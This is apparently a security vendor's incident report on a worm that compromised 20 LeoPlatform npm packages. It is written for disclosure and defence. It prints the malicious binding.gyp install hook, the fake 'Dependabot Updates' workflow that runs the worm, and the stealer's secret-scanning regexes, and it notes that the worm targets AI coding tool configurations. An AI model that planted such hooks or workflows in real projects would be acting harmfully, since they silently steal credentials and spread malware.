Miasma Worm Infects Multiple LeoPlatform npm Packages

A Miasma worm variant hit the LeoPlatform npm ecosystem on June 24, 2026. The attacker compromised a single maintainer’s npm and GitHub tokens and used them to publish infected versions of 20 packages in a 3-second burst. The same tokens pushed weaponized GitHub Actions workflows, disguised as Dependabot, to at least three repos. The payload matches the Miasma supply chain attack toolkit documented in our earlier source code analysis: a polymorphically packed Bun-based credential stealer and self-propagating worm that targets npm, PyPI, RubyGems, GitHub, AWS, Kubernetes, HashiCorp Vault, and AI coding tool configurations.

TL;DR

• 20 npm packages under the LeoPlatform / LeoInsights org received malicious updates at 2026-06-24T23:04:55Z
• Every infected package contains a binding.gyp that triggers the payload during npm install, bypassing lifecycle script scanners
• The payload is identical across all 20 packages after decryption (same SHA256), packed with per-package ROT cipher values and AES-128-GCM keys
• The compromised maintainer account (czirker) also pushed orphan snapshot-* branches to three GitHub repos, each carrying a 5.2 MB worm payload and a fake “Dependabot Updates” workflow
• Combined weekly download count across the 20 packages is roughly 13,600

The 20 infected packages

All 20 packages were published within the same 3-second window. The npm registry time metadata confirms they share a single automated publish run:

The highest-traffic targets are leo-logger (3,140 weekly downloads), leo-sdk (1,830), leo-aws (1,730), leo-config (1,709), and leo-streams (1,497). Four packages under the same maintainers were not infected: leo-connector-common, leo-connector-entity-table, leo-connector-postgres, and leo-connector-sqlserver. All four have their npm latest dist-tag pointing to a prerelease version (-rc or -beta). The worm likely skips packages where the latest tag is not a stable release.

How the infection works

Every infected package received the same three modifications compared to its previous clean version.

1. A new binding.gyp file. The file contains a single node-gyp target that uses command expansion to run node index.js during npm install:

1
// binding.gyp (identical across all 20 packages)
2
{
3
  "targets": [
4
    {
5
      "target_name": "nothing",
6
      "type": "none",
7
      "sources": ["<!(node index.js > /dev/null 2>&1 && echo stub.c)"]
8
    }
9
  ]
10
}

The <!(...) syntax is a GYP command expansion that runs a shell command during project generation. npm automatically invokes node-gyp rebuild when a binding.gyp is present, regardless of whether the package.json defines any install or postinstall script. This bypasses tools that only inspect lifecycle scripts.

2. A replaced index.js. The original module code is wiped and replaced with a single-line obfuscated payload of roughly 5.2 MB. The obfuscation has three layers:

1
try { eval(
2
  ROT-N( charCodeArray.map(c => String.fromCharCode(c)).join(""), N )
3
)}

Each package uses a different ROT value (5, 8, 19, or 23) and a different set of AES-128-GCM keys. After decryption, every package yields the same two blobs:

The _b blob downloads Bun 1.3.13 from GitHub releases, caches the binary in a temp directory, and exposes a global getBunPath() function. The _p blob (the worm) is written to /tmp/p<random>.js and executed via bun run. The temp file is deleted after execution.

3. A new bun dependency. Every infected package.json adds "bun": "^1.3.13". This is the npm Bun installer package, likely included as a fallback path for environments where the bootstrapper’s curl download fails.

Root cause: one compromised maintainer

The npm account czirker (Clint Zirker, [email protected]) is the only maintainer present on all 20 infected packages. Other maintainers like leoinsights, jgrantr, and elsmob appear on subsets, but czirker is the common denominator. The worm used this account’s npm token for the mass publish and its GitHub token for the repo-level attacks.

A registry metadata query confirms the maintainer list:

1
curl -s "https://registry.npmjs.org/rstreams-shard-util" \
2
  | jq '{maintainers, "dist-tags", time}'

1
{
2
  "maintainers": [{ "name": "czirker", "email": "[email protected]" }],
3
  "dist-tags": { "latest": "1.0.1", "beta": "2.0.0-beta.1" },
4
  "time": {
5
    "1.0.0": "2024-11-05T21:36:55.013Z",
6
    "1.0.1": "2026-06-24T23:04:55.296Z"
7
  }
8
}

The jump from 1.0.0 (November 2024) to 1.0.1 (June 24, 2026) is the infected version. This pattern repeats across all 20 packages: a long-dormant legitimate package suddenly receives a new version with a 5 MB index.js and a binding.gyp.

GitHub repo poisoning

The worm did not stop at npm. GitHub event logs for three LeoPlatform repositories show czirker creating orphan branches named snapshot-<hex> at 22:50 UTC, roughly 14 minutes before the npm publishes:

1
22:50:34Z  CreateEvent  czirker  snapshot-f121a878  LeoPlatform/Nodejs
2
22:50:52Z  CreateEvent  czirker  snapshot-463d9ff7  LeoPlatform/auth-sdk
3
22:50:58Z  CreateEvent  czirker  snapshot-afacc302  LeoPlatform/Leo
4
23:03:04Z  PushEvent    czirker  snapshot-f121a878  LeoPlatform/Nodejs
5
23:04:55Z  (npm publishes begin)

The commit on the snapshot-f121a878 branch of LeoPlatform/Nodejs tells the story. It is an orphan commit (no parent) authored as czirker, with the message “chore: update dependencies”. It adds two files:

1
added  .github/workflows/npm-publish.yml  (+19 lines)
2
added  _index.js                          (+1 line, 5,285,240 bytes)

The _index.js is the same 5.2 MB worm payload. The workflow is a weaponized GitHub Actions pipeline:

1
// .github/workflows/npm-publish.yml @ 5b32ae020b1b (orphan commit)
2
name: Dependabot Updates
3
run-name: Dependabot Updates
4
on:
5
  push
6
permissions:
7
  id-token: write
8
  contents: read
9
jobs:
10
  release:
11
    runs-on: ubuntu-latest
12
    steps:
13
      - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd
14
      - uses: oven-sh/setup-bun@0c5077e51419868618aeaa5fe8019c62421857d6
15
      - name: prepare
16
        run: bun run _index.js
17
        env:
18
          OIDC_PACKAGES: "leo-sdk"
19
          WORKFLOW_ID: "npm-publish.yml"
20
          REPO_ID_SUFFIX: "LeoPlatform/Nodejs"

Three things stand out. The workflow triggers on every push to any branch. It requests id-token: write, which grants access to a GitHub OIDC token that can be exchanged for npm publish credentials via npm’s trusted publishing. And it is named “Dependabot Updates” to blend in with legitimate dependency PRs.

A follow-up commit, this time impersonating dependabot[bot], replaced the OIDC parameters with a direct NPM_TOKEN: ${{ secrets.NPM_TOKEN }} reference, suggesting the worm tries multiple publish strategies. Both the actions/checkout and oven-sh/setup-bun SHAs point to legitimate releases (a January 2026 checkout fix and Bun setup v2.2.0, respectively).

The master branch of LeoPlatform/Nodejs is clean. The weaponized workflow lives only on the orphan snapshot branch, where it would execute if merged or if a CI configuration runs workflows from all branches.

The worm payload

The inner code uses the standard javascript-obfuscator pattern: a _0x66ee string lookup table with 2,588 entries, a _0x42e6 decoder function, and a secondary runtime-constructed decoder (fb12914b2) called 519 times to decrypt environment variable names and API endpoints.

Static string analysis of the decrypted payload reveals the same capability set documented in our Miasma source code analysis:

Credential theft across npm, GitHub (PATs, OIDC, JWTs), PyPI, RubyGems, Kubernetes service account tokens, HashiCorp Vault, AWS (IAM keys, STS, IMDS, Secrets Manager, SSM), 1Password, JFrog Artifactory, and SSH private keys.

Secret scanning via regex patterns for auth tokens, private keys, and .npmrc credentials:

1
// Regex patterns extracted from the decrypted payload string table
2
/"auth":\s*"[A-Za-z0-9+\/=]{20,}"/g
3
/-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----/g
4
/ssh-(rsa|ed25519|dss) AAAA[0-9A-Za-z+\/]{100,}/g

AI coding tool targeting, the Miasma family signature: the payload references claudeSettingsPath, cursorRulesPath, geminiSettingsPath, and vscodeTasksPath.

npm worm propagation with automated package enumeration (npmRepos, maxPackages), version bumping (newVersion), and publish tracking (totalPackages, published, failed, publishStepIndex).

GitHub Actions workflow scanning using regex for npm publish and yarn publish in CI configs, with hasIdTokenWrite checks for OIDC-based publishing.

For a complete breakdown of each module, see Inside the Miasma Software Supply Chain Attack Toolkit.

Indicators of compromise

Quick detection check. Any npm package that added a binding.gyp containing <!(node index.js in a recent version bump, combined with a new "bun" dependency and an index.js that grew to several megabytes, should be treated as infected.

Infected packages (CSV)

Related posts

• Inside the Miasma Software Supply Chain Attack Toolkit, source code analysis of the Miasma worm
• Miasma Worm Targets AI Coding Agents via GitHub Repos, the GitHub repo persistence variant
• Mini Shai-Hulud Hits @redhat-cloud-services, 32 packages compromised via OIDC trusted publishing